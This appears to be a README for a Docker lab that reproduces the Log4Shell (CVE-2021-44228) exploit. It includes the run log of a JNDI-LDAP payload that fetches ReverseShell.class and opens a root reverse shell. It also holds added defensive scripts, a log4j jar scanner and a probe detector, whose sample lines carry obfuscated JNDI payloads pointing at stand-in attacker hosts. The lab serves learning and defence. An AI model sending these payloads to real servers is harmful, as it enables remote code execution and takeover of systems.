This is a self-contained lab environment that runs the exploit safely, all from docker compose.
The affected versions are Apache Log4j 2.0-beta9 through 2.14.1; the vulnerability is tracked as CVE-2021-44228 (CVSS score: 10.0).
This code requires Docker and Docker Compose.
The Dockerfile and docker-compose.yml files are self-explanatory; they build and start the lab environment.
The victim server log4shell-server is built from a Spring Initializr demo project and pulls in the vulnerable Log4j 2.14.1 through spring-boot-starter-log4j2 2.6.1.
The vulnerable code is located inside DemoApplication.java.
Remote code execution is served by the rce-server, which hosts the ReverseShell.class payload over HTTP.
The intermediate LDAP server is based on the LDAP referral server from "Java Unmarshaller Security - Turning your data into code execution" (the marshalsec project).
The attack vector is sent from the attack-vector script; it makes the victim set up a connection to the reverse-shell server.
The reverse-shell server waits for that connection and then sends an example command, echo $(whoami), through the reverse shell; the command is executed on the victim server log4shell-server.
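Before running the lab it is worth confirming that the victim jar really ships an affected log4j-core, and the same check is what you would run against your own builds. The script below is an added example, not part of this repository: it reads the version from log4j-core's pom.properties, checks whether JndiLookup.class is still present (deleting that class was Apache's mitigation for deployments that could not upgrade), and recurses into nested jars so a Spring Boot fat jar such as /app/spring-boot-application.jar is covered. The version range follows Apache's advisory, including the 2.12.2 (Java 7) and 2.3.1 (Java 6) back-port releases that carried the fix. The jars it scans in the demo are constructed in memory and only mimic the two entries the check reads.

```python
"""Check a jar (or a Spring Boot fat jar) for a log4j-core affected by CVE-2021-44228.

Added example, not part of the lab repository. Two signals: the version
recorded in log4j-core's pom.properties, and whether JndiLookup.class is
still present (removing it was the official mitigation for deployments that
could not upgrade). Nested jars such as BOOT-INF/lib/*.jar inside a
Spring Boot application jar are scanned recursively.
"""
import io
import re
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d*))?$")


def parse_version(v: str):
    """'2.14.1' and '2.0-beta9' -> sortable tuples; a pre-release tag sorts
    before the corresponding final release (2.0-beta9 < 2.0 < 2.0.1)."""
    m = _VERSION.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {v!r}")
    major, minor, patch, tag, tagnum = m.groups()
    return (int(major), int(minor), int(patch or 0),
            0 if tag else 1, tag or "", int(tagnum or 0))


def version_is_affected(v: str) -> bool:
    """CVE-2021-44228 range 2.0-beta9..2.14.1, minus the 2.12.2 (Java 7)
    and 2.3.1 (Java 6) back-port releases that carried the fix."""
    t = parse_version(v)
    if not parse_version("2.0-beta9") <= t <= parse_version("2.14.1"):
        return False
    if parse_version("2.12.2") <= t < parse_version("2.13.0"):
        return False
    if parse_version("2.3.1") <= t < parse_version("2.4.0"):
        return False
    return True


def verdict(version, has_jndi_lookup: bool) -> str:
    if not has_jndi_lookup:
        return "mitigated: JndiLookup.class removed"
    if version is None:
        return "unknown version, JndiLookup present: review manually"
    return "vulnerable" if version_is_affected(version) else "not affected"


def scan_jar(source, name="<jar>", depth=0):
    """source is a path or raw bytes; returns one finding per log4j-core found."""
    findings = []
    raw = io.BytesIO(source) if isinstance(source, (bytes, bytearray)) else source
    with zipfile.ZipFile(raw) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_LOOKUP in names:
            version = None
            if POM_PROPS in names:
                for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                    key, _, value = line.partition("=")
                    if key.strip() == "version":
                        version = value.strip()
            findings.append({"jar": name, "version": version,
                             "jndi_lookup": JNDI_LOOKUP in names,
                             "verdict": verdict(version, JNDI_LOOKUP in names)})
        if depth < 3:  # Spring Boot and shaded jars nest further jars inside
            for entry in sorted(names):
                if entry.lower().endswith(".jar"):
                    findings.extend(scan_jar(zf.read(entry), f"{name}!/{entry}", depth + 1))
    return findings


def make_fake_jar(version: str, include_jndi_lookup: bool = True) -> bytes:
    """Constructed sample: a zip holding only the two entries the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class
    return buf.getvalue()


def make_fake_boot_jar(log4j_version: str) -> bytes:
    """Constructed sample mimicking the layout of a Spring Boot fat jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("BOOT-INF/classes/com/example/demo/DemoApplication.class", b"")
        zf.writestr(f"BOOT-INF/lib/log4j-core-{log4j_version}.jar", make_fake_jar(log4j_version))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_jar(make_fake_boot_jar("2.14.1"), "spring-boot-application.jar"):
        print(finding)
```

To check a real artifact, call scan_jar("/path/to/app.jar"); a "mitigated" verdict on a 2.14.1 jar means someone already stripped JndiLookup.class, which protects against this CVE but is no substitute for upgrading.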
git clone https://github.com/j3kz/CVE-2021-44228-PoC.git
cd CVE-2021-44228-PoC
docker compose up
ldap-server | Listening on 0.0.0.0:1389
LDAP server ready and listening.
reverse-shell | listening on [::]:4242 ...
Reverse-shell server ready and listening.
log4shell-server |
log4shell-server | . ____ _ __ _ _
log4shell-server | /\\ / ___'_ __ _ _(_)_ __ __ _ \ \ \ \
log4shell-server | ( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
log4shell-server | \\/ ___)| |_)| | | | | || (_| | ) ) ) )
log4shell-server | ' |____| .__|_| |_|_| |_\__, | / / / /
log4shell-server | =========|_|==============|___/=/_/_/_/
log4shell-server | :: Spring Boot :: (v2.6.1)
log4shell-server |
log4shell-server | 2021-12-18 12:31:37.695 INFO 1 --- [ main] c.e.d.DemoApplication : Starting DemoApplication using Java 1.8.0_181 on 46edaaf2f7eb with PID 1 (/app/spring-boot-application.jar started by root in /)
log4shell-server | 2021-12-18 12:31:37.739 INFO 1 --- [ main] c.e.d.DemoApplication : No active profile set, falling back to default profiles: default
log4shell-server | 2021-12-18 12:31:42.337 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat initialized with port(s): 8080 (http)
log4shell-server | 2021-12-18 12:31:42.439 INFO 1 --- [ main] o.a.c.c.StandardService : Starting service [Tomcat]
log4shell-server | 2021-12-18 12:31:42.440 INFO 1 --- [ main] o.a.c.c.StandardEngine : Starting Servlet engine: [Apache Tomcat/9.0.55]
log4shell-server | 2021-12-18 12:31:42.717 INFO 1 --- [ main] o.a.c.c.C.[.[.[/] : Initializing Spring embedded WebApplicationContext
log4shell-server | 2021-12-18 12:31:42.718 INFO 1 --- [ main] w.s.c.ServletWebServerApplicationContext : Root WebApplicationContext: initialization completed in 4549 ms
log4shell-server | 2021-12-18 12:31:44.660 INFO 1 --- [ main] o.s.b.w.e.t.TomcatWebServer : Tomcat started on port(s): 8080 (http) with context path ''
Vulnerable server ready and listening.
attack-vector | 👌 log4shell-server:8080 is listening!
attack-vector | 🚀 Sending attack vector ...
The attack-vector container waits until the victim listens on port 8080, then sends the request carrying the attack vector.
log4shell-server | 2021-12-18 12:31:44.740 INFO 1 --- [ main] c.e.d.DemoApplication : Started DemoApplication in 8.402 seconds (JVM running for 11.113)
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.a.c.c.C.[.[.[/] : Initializing Spring DispatcherServlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.110 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Initializing Servlet 'dispatcherServlet'
log4shell-server | 2021-12-18 12:31:45.112 INFO 1 --- [nio-8080-exec-1] o.s.w.s.DispatcherServlet : Completed initialization in 2 ms
ldap-server | Send LDAP reference result for attack-vector redirecting to http://rce-server:3000/ReverseShell.class
rce-server | 172.31.0.3 - - [18/Dec/2021:12:31:45 +0000] "GET /ReverseShell.class HTTP/1.1" 200 891 "" "Java/1.8.0_181"
The vulnerable server handles the request and logs it, which triggers the JNDI lookup against the LDAP server; the LDAP server answers with a reference pointing at the RCE server, and the victim JVM (User-Agent Java/1.8.0_181) fetches ReverseShell.class from it.
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:43877 ([::ffff:172.31.0.3]:43877)
reverse-shell | 👻 Hello from the log4shell-server! We are root.
reverse-shell | listening on [::]:4242 ...
reverse-shell | connect to [::ffff:172.31.0.5]:4242 from [::ffff:172.31.0.3]:41249 ([::ffff:172.31.0.3]:41249)
The fetched class is executed and the victim server opens the reverse shell, so the reverse-shell server can run remote commands on it.
log4shell-server | 2021-12-18 12:31:45.187 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello param:name: ReverseShell@22fb868
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:host: log4shell-server:8080
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:user-agent: curl/7.80.0
log4shell-server | 2021-12-18 12:31:45.345 INFO 1 --- [nio-8080-exec-1] Demo : GET /hello header:accept: */*
The victim server logs the attack vector request; note that the logged name parameter already reads ReverseShell@22fb868, the toString() of the object instantiated by the JNDI lookup, rather than the raw ${jndi:...} string.
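The lookup fires at the moment the request is logged, so the request line and headers above are where a defender can catch the attempt. The detector below is an added example, not part of the lab repository: it percent-decodes each line, collapses the lookup nesting that Log4j 2 itself resolves before the jndi lookup runs (${lower:...}, ${upper:...} and ${x:-default} forms, which attackers use to dodge naive "${jndi:" matching), then matches the resulting ${jndi: prefix and extracts the callback scheme and host for blocking. The log lines it scans are constructed for the example and are not the lab's real output.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in request logs.

Added example, not part of the lab repository. Before matching, the text
is percent-decoded and the lookup nesting that Log4j 2 would resolve
itself is collapsed (${lower:J} -> j, ${::-j} -> j, ${env:UNSET:-j} -> j),
so "${${lower:j}ndi:...}" ends up as "${jndi:...}".
"""
import re
import urllib.parse
from typing import Optional

# Innermost ${...}: a lookup body that contains no further "${".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What remains after normalisation when the line carries a JNDI lookup.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Scheme and host:port of the attacker-controlled callback.
_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def _resolve_one(body: str) -> Optional[str]:
    """Evaluate one non-nested lookup body the way Log4j 2.x would.

    Returns the substituted text, or None when the lookup must stay as
    written: the JNDI lookup itself (kept so the detector can match it)
    or an unknown lookup without a default value.
    """
    prefix, _, rest = body.partition(":")
    key = prefix.strip().lower()          # lookup prefixes are case-insensitive
    if key == "jndi":
        return None
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if ":-" in body:                      # ${env:UNSET:-j}, ${::-j}: the default wins
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_passes: int = 20) -> str:
    """Percent-decode (twice, for double encoding) and collapse nested lookups
    from the inside out until nothing changes."""
    s = urllib.parse.unquote(urllib.parse.unquote(text))

    def repl(m: re.Match) -> str:
        out = _resolve_one(m.group(1))
        return m.group(0) if out is None else out

    for _ in range(max_passes):
        new = _INNER.sub(repl, s)
        if new == s:
            break
        s = new
    return s


def is_log4shell_probe(text: str) -> bool:
    return _JNDI.search(normalize(text)) is not None


def scan_log(lines):
    """Return one finding per line that carries a JNDI lookup."""
    findings = []
    for line in lines:
        norm = normalize(line)
        if not _JNDI.search(norm):
            continue
        m = _TARGET.search(norm)
        findings.append({
            "line": line,
            "normalized": norm,
            "scheme": m.group(1).lower() if m else None,
            "host": m.group(2) if m else None,
        })
    return findings


# Constructed sample log lines (not taken from the lab's output).
SAMPLE_LOG = [
    # Plain payload, the form the lab's attack-vector container sends.
    "GET /hello?name=${jndi:ldap://ldap-server:1389/attack-vector} 200",
    # Same thing URL-encoded, as an access log would usually record it.
    "GET /hello?name=%24%7Bjndi%3Aldap%3A%2F%2Fldap-server%3A1389%2Fa%7D 200",
    # Obfuscated: ${lower:j} and ${::-n} are resolved before the JNDI lookup.
    "GET /hello?name=${${lower:j}${::-n}di:${lower:L}dap://evil.example:1389/x} 200",
    # Obfuscated through an env lookup's default value, different protocol.
    "User-Agent: ${${env:NOPE:-j}ndi:rmi://203.0.113.5:1099/obj}",
    # Benign lookups and plain input must not be flagged.
    "GET /hello?name=${date:yyyy-MM-dd} 200",
    "GET /hello?name=World 200",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['scheme']}://{f['host']}  <-  {f['line']}")
```

The normalisation is deliberately limited to the lookups Log4j evaluates purely from the string (case conversion and defaults); it does not try to emulate ${sys:...} or ${env:...} values that resolve on the victim, so a line that still contains unresolved lookups after normalisation is worth a second look even when it does not match.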
attack-vector | 🔥 Server returned:
attack-vector | > HTTP/1.1 200
attack-vector | > Content-Type: text/plain;charset=UTF-8
attack-vector | > Content-Length: 52
attack-vector | > Date: Sat, 18 Dec 2021 12:31:45 GMT
attack-vector | >
attack-vector | > Hello ${jndi:ldap://ldap-server:1389/attack-vector}!
attack-vector | Attack should be successfull, have a nice day!
The attack-vector container logs the victim's response, which still echoes the raw ${jndi:...} string because the lookup only happens in the logger and not in the response body, and then exits.
This repository is only about learning from the vulnerability.
The project is not intended to be, and must not be, used to exploit CVE-2021-44228 against any server without the consent of its owner.
Any use for malicious activity is prohibited and may be prosecuted under applicable law.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/